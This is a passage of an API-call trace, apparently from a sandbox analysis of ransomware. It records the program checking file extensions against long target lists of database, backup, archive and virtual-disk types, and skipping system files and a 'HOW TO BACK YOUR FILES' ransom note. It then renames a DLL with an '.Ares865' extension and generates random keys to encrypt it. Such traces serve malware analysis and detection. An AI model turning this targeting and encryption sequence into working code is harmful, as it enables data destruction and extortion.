(lpString1="g.dll", lpString2="accde") returned 1 [0089.108] lstrlenW (lpString="accdr") returned 5 [0089.108] lstrcmpiW (lpString1="g.dll", lpString2="accdr") returned 1 [0089.108] lstrlenW (lpString="accdt") returned 5 [0089.108] lstrcmpiW (lpString1="g.dll", lpString2="accdt") returned 1 [0089.108] lstrlenW (lpString="accdw") returned 5 [0089.108] lstrcmpiW (lpString1="g.dll", lpString2="accdw") returned 1 [0089.108] lstrlenW (lpString="accft") returned 5 [0089.108] lstrcmpiW (lpString1="g.dll", lpString2="accft") returned 1 [0089.108] lstrlenW (lpString="adb") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0089.108] lstrlenW (lpString="adb") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0089.108] lstrlenW (lpString="ade") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0089.108] lstrlenW (lpString="adf") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0089.108] lstrlenW (lpString="adn") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0089.108] lstrlenW (lpString="adp") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0089.108] lstrlenW (lpString="alf") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0089.108] lstrlenW (lpString="ask") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0089.108] lstrlenW (lpString="btr") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0089.108] lstrlenW (lpString="cat") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0089.108] lstrlenW (lpString="cdb") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0089.108] lstrlenW (lpString="ckp") returned 3 [0089.108] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0089.109] lstrlenW (lpString="cma") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0089.109] lstrlenW (lpString="cpd") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0089.109] lstrlenW (lpString="dacpac") returned 6 [0089.109] lstrcmpiW (lpString1="ig.dll", lpString2="dacpac") returned 1 [0089.109] lstrlenW (lpString="dad") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0089.109] lstrlenW (lpString="dadiagrams") returned 10 [0089.109] lstrcmpiW (lpString1="config.dll", lpString2="dadiagrams") returned -1 [0089.109] lstrlenW (lpString="daschema") returned 8 [0089.109] lstrcmpiW (lpString1="nfig.dll", lpString2="daschema") returned 1 [0089.109] lstrlenW (lpString="db-journal") returned 10 [0089.109] lstrcmpiW (lpString1="config.dll", lpString2="db-journal") returned -1 [0089.109] lstrlenW (lpString="db-shm") returned 6 [0089.109] lstrcmpiW (lpString1="ig.dll", lpString2="db-shm") returned 1 [0089.109] lstrlenW (lpString="db-wal") returned 6 [0089.109] lstrcmpiW (lpString1="ig.dll", lpString2="db-wal") returned 1 [0089.109] lstrlenW (lpString="dbc") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0089.109] lstrlenW (lpString="dbs") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0089.109] lstrlenW (lpString="dbt") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0089.109] lstrlenW (lpString="dbv") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0089.109] lstrlenW (lpString="dbx") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0089.109] lstrlenW (lpString="dcb") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0089.109] lstrlenW (lpString="dct") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0089.109] lstrlenW (lpString="dcx") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0089.109] lstrlenW (lpString="ddl") returned 3 [0089.109] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0089.109] lstrlenW (lpString="dlis") returned 4 [0089.109] lstrcmpiW (lpString1=".dll", lpString2="dlis") returned -1 [0089.110] lstrlenW (lpString="dp1") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0089.110] lstrlenW (lpString="dqy") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0089.110] lstrlenW (lpString="dsk") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0089.110] lstrlenW (lpString="dsn") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0089.110] lstrlenW (lpString="dtsx") returned 4 [0089.110] lstrcmpiW (lpString1=".dll", lpString2="dtsx") returned -1 [0089.110] lstrlenW (lpString="dxl") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0089.110] lstrlenW (lpString="eco") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0089.110] lstrlenW (lpString="ecx") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0089.110] lstrlenW (lpString="edb") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0089.110] lstrlenW (lpString="epim") returned 4 [0089.110] lstrcmpiW (lpString1=".dll", lpString2="epim") returned -1 [0089.110] lstrlenW (lpString="fcd") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0089.110] lstrlenW (lpString="fdb") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0089.110] lstrlenW (lpString="fic") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0089.110] lstrlenW (lpString="flexolibrary") returned 12 [0089.110] lstrcmpiW (lpString1="rlconfig.dll", lpString2="flexolibrary") returned 1 [0089.110] lstrlenW (lpString="fm5") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0089.110] lstrlenW (lpString="fmp") returned 3 [0089.110] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0089.110] lstrlenW (lpString="fmp12") returned 5 [0089.110] lstrcmpiW (lpString1="g.dll", lpString2="fmp12") returned 1 [0089.110] lstrlenW (lpString="fmpsl") returned 5 [0089.110] lstrcmpiW (lpString1="g.dll", lpString2="fmpsl") returned 1 [0089.110] lstrlenW (lpString="fol") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0089.111] lstrlenW (lpString="fp3") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0089.111] lstrlenW (lpString="fp4") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0089.111] lstrlenW (lpString="fp5") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0089.111] lstrlenW (lpString="fp7") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0089.111] lstrlenW (lpString="fpt") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0089.111] lstrlenW (lpString="frm") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0089.111] lstrlenW (lpString="gdb") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0089.111] lstrlenW (lpString="gdb") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0089.111] lstrlenW (lpString="grdb") returned 4 [0089.111] lstrcmpiW (lpString1=".dll", lpString2="grdb") returned -1 [0089.111] lstrlenW (lpString="gwi") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0089.111] lstrlenW (lpString="hdb") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0089.111] lstrlenW (lpString="his") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0089.111] lstrlenW (lpString="ib") returned 2 [0089.111] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0089.111] lstrlenW (lpString="idb") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0089.111] lstrlenW (lpString="ihx") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0089.111] lstrlenW (lpString="itdb") returned 4 [0089.111] lstrcmpiW (lpString1=".dll", lpString2="itdb") returned -1 [0089.111] lstrlenW (lpString="itw") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0089.111] lstrlenW (lpString="jet") returned 3 [0089.111] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0089.111] lstrlenW (lpString="jtx") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0089.112] lstrlenW (lpString="kdb") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0089.112] lstrlenW (lpString="kexi") returned 4 [0089.112] lstrcmpiW (lpString1=".dll", lpString2="kexi") returned -1 [0089.112] lstrlenW (lpString="kexic") returned 5 [0089.112] lstrcmpiW (lpString1="g.dll", lpString2="kexic") returned -1 [0089.112] lstrlenW (lpString="kexis") returned 5 [0089.112] lstrcmpiW (lpString1="g.dll", lpString2="kexis") returned -1 [0089.112] lstrlenW (lpString="lgc") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0089.112] lstrlenW (lpString="lwx") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0089.112] lstrlenW (lpString="maf") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0089.112] lstrlenW (lpString="maq") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0089.112] lstrlenW (lpString="mar") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0089.112] lstrlenW (lpString="marshal") returned 7 [0089.112] lstrcmpiW (lpString1="fig.dll", lpString2="marshal") returned -1 [0089.112] lstrlenW (lpString="mas") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0089.112] lstrlenW (lpString="mav") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0089.112] lstrlenW (lpString="maw") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0089.112] lstrlenW (lpString="mdbhtml") returned 7 [0089.112] lstrcmpiW (lpString1="fig.dll", lpString2="mdbhtml") returned -1 [0089.112] lstrlenW (lpString="mdn") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0089.112] lstrlenW (lpString="mdt") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0089.112] lstrlenW (lpString="mfd") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0089.112] lstrlenW (lpString="mpd") returned 3 [0089.112] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0089.112] lstrlenW (lpString="mrg") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0089.113] lstrlenW (lpString="mud") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0089.113] lstrlenW (lpString="mwb") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0089.113] lstrlenW (lpString="myd") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0089.113] lstrlenW (lpString="ndf") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0089.113] lstrlenW (lpString="nnt") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0089.113] lstrlenW (lpString="nrmlib") returned 6 [0089.113] lstrcmpiW (lpString1="ig.dll", lpString2="nrmlib") returned -1 [0089.113] lstrlenW (lpString="ns2") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0089.113] lstrlenW (lpString="ns3") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0089.113] lstrlenW (lpString="ns4") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0089.113] lstrlenW (lpString="nsf") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0089.113] lstrlenW (lpString="nv") returned 2 [0089.113] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0089.113] lstrlenW (lpString="nv2") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0089.113] lstrlenW (lpString="nwdb") returned 4 [0089.113] lstrcmpiW (lpString1=".dll", lpString2="nwdb") returned -1 [0089.113] lstrlenW (lpString="nyf") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0089.113] lstrlenW (lpString="odb") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0089.113] lstrlenW (lpString="odb") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0089.113] lstrlenW (lpString="oqy") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0089.113] lstrlenW (lpString="ora") returned 3 [0089.113] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0089.113] lstrlenW (lpString="orx") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0089.114] lstrlenW (lpString="owc") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0089.114] lstrlenW (lpString="p96") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0089.114] lstrlenW (lpString="p97") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0089.114] lstrlenW (lpString="pan") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0089.114] lstrlenW (lpString="pdb") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0089.114] lstrlenW (lpString="pdm") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0089.114] lstrlenW (lpString="pnz") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0089.114] lstrlenW (lpString="qry") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0089.114] lstrlenW (lpString="qvd") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0089.114] lstrlenW (lpString="rbf") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0089.114] lstrlenW (lpString="rctd") returned 4 [0089.114] lstrcmpiW (lpString1=".dll", lpString2="rctd") returned -1 [0089.114] lstrlenW (lpString="rod") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0089.114] lstrlenW (lpString="rodx") returned 4 [0089.114] lstrcmpiW (lpString1=".dll", lpString2="rodx") returned -1 [0089.114] lstrlenW (lpString="rpd") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0089.114] lstrlenW (lpString="rsd") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0089.114] lstrlenW (lpString="sas7bdat") returned 8 [0089.114] lstrcmpiW (lpString1="nfig.dll", lpString2="sas7bdat") returned -1 [0089.114] lstrlenW (lpString="sbf") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0089.114] lstrlenW (lpString="scx") returned 3 [0089.114] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0089.115] lstrlenW (lpString="sdb") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0089.115] lstrlenW (lpString="sdc") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0089.115] lstrlenW (lpString="sdf") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0089.115] lstrlenW (lpString="sis") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0089.115] lstrlenW (lpString="spq") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0089.115] lstrlenW (lpString="te") returned 2 [0089.115] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0089.115] lstrlenW (lpString="teacher") returned 7 [0089.115] lstrcmpiW (lpString1="fig.dll", lpString2="teacher") returned -1 [0089.115] lstrlenW (lpString="tmd") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0089.115] lstrlenW (lpString="tps") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0089.115] lstrlenW (lpString="trc") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0089.115] lstrlenW (lpString="trc") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0089.115] lstrlenW (lpString="trm") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0089.115] lstrlenW (lpString="udb") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0089.115] lstrlenW (lpString="udl") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0089.115] lstrlenW (lpString="usr") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0089.115] lstrlenW (lpString="v12") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0089.115] lstrlenW (lpString="vis") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0089.115] lstrlenW (lpString="vpd") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0089.115] lstrlenW (lpString="vvv") returned 3 [0089.115] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0089.116] lstrlenW (lpString="wdb") returned 3 [0089.116] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0089.116] lstrlenW (lpString="wmdb") returned 4 [0089.116] lstrcmpiW (lpString1=".dll", lpString2="wmdb") returned -1 [0089.116] lstrlenW (lpString="wrk") returned 3 [0089.116] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0089.116] lstrlenW (lpString="xdb") returned 3 [0089.116] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0089.116] lstrlenW (lpString="xld") returned 3 [0089.116] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0089.116] lstrlenW (lpString="xmlff") returned 5 [0089.116] lstrcmpiW (lpString1="g.dll", lpString2="xmlff") returned -1 [0089.116] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.Ares865") returned 64 [0089.116] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlconfig.dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlconfig.dll.ares865"), dwFlags=0x1) returned 1 [0089.117] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlconfig.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.117] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15616) returned 1 [0089.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.118] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.118] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.118] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.118] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4000, lpName=0x0) returned 0x15c [0089.120] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4000) returned 0x190000 [0089.121] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.122] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.122] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.122] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.122] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.123] CloseHandle (hObject=0x15c) returned 1 [0089.123] CloseHandle (hObject=0x118) returned 1 [0089.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.123] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="aoldtz.exe") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2=".") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="..") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="windows") returned -1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="bootmgr") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="temp") returned -1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="pagefile.sys") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="boot") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="ids.txt") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="ntuser.dat") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="perflogs") returned 1 [0089.123] lstrcmpiW (lpString1="ppcrlui.dll", lpString2="MSBuild") returned 1 [0089.123] lstrlenW (lpString="ppcrlui.dll") returned 11 [0089.123] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0089.123] lstrcpyW (in: lpString1=0x2cce452, lpString2="ppcrlui.dll" | out: lpString1="ppcrlui.dll") returned="ppcrlui.dll" [0089.123] lstrlenW (lpString="ppcrlui.dll") returned 11 [0089.123] lstrlenW (lpString="Ares865") returned 7 [0089.123] lstrcmpiW (lpString1="lui.dll", lpString2="Ares865") returned 1 [0089.123] lstrlenW (lpString=".dll") returned 4 [0089.124] lstrcmpiW (lpString1="ppcrlui.dll", lpString2=".dll") returned 1 [0089.124] lstrlenW (lpString=".lnk") returned 4 [0089.124] lstrcmpiW (lpString1="ppcrlui.dll", lpString2=".lnk") returned 1 [0089.124] lstrlenW (lpString=".ini") returned 4 [0089.124] lstrcmpiW (lpString1="ppcrlui.dll", lpString2=".ini") returned 1 [0089.124] lstrlenW (lpString=".sys") returned 4 [0089.124] lstrcmpiW (lpString1="ppcrlui.dll", lpString2=".sys") returned 1 [0089.124] lstrlenW (lpString="ppcrlui.dll") returned 11 [0089.124] lstrlenW (lpString="bak") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0089.124] lstrlenW (lpString="ba_") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0089.124] lstrlenW (lpString="dbb") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0089.124] lstrlenW (lpString="vmdk") returned 4 [0089.124] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0089.124] lstrlenW (lpString="rar") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0089.124] lstrlenW (lpString="zip") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0089.124] lstrlenW (lpString="tgz") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0089.124] lstrlenW (lpString="vbox") returned 4 [0089.124] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0089.124] lstrlenW (lpString="vdi") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0089.124] lstrlenW (lpString="vhd") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0089.124] lstrlenW (lpString="vhdx") returned 4 [0089.124] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0089.124] lstrlenW (lpString="avhd") returned 4 [0089.124] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0089.124] lstrlenW (lpString="db") returned 2 [0089.124] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0089.124] lstrlenW (lpString="db2") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0089.124] lstrlenW (lpString="db3") returned 3 [0089.124] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0089.125] lstrlenW (lpString="dbf") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0089.125] lstrlenW (lpString="mdf") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0089.125] lstrlenW (lpString="mdb") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0089.125] lstrlenW (lpString="sql") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0089.125] lstrlenW (lpString="sqlite") returned 6 [0089.125] lstrcmpiW (lpString1="ui.dll", lpString2="sqlite") returned 1 [0089.125] lstrlenW (lpString="sqlite3") returned 7 [0089.125] lstrcmpiW (lpString1="lui.dll", lpString2="sqlite3") returned -1 [0089.125] lstrlenW (lpString="sqlitedb") returned 8 [0089.125] lstrcmpiW (lpString1="rlui.dll", lpString2="sqlitedb") returned -1 [0089.125] lstrlenW (lpString="xml") returned 3 [0089.125] 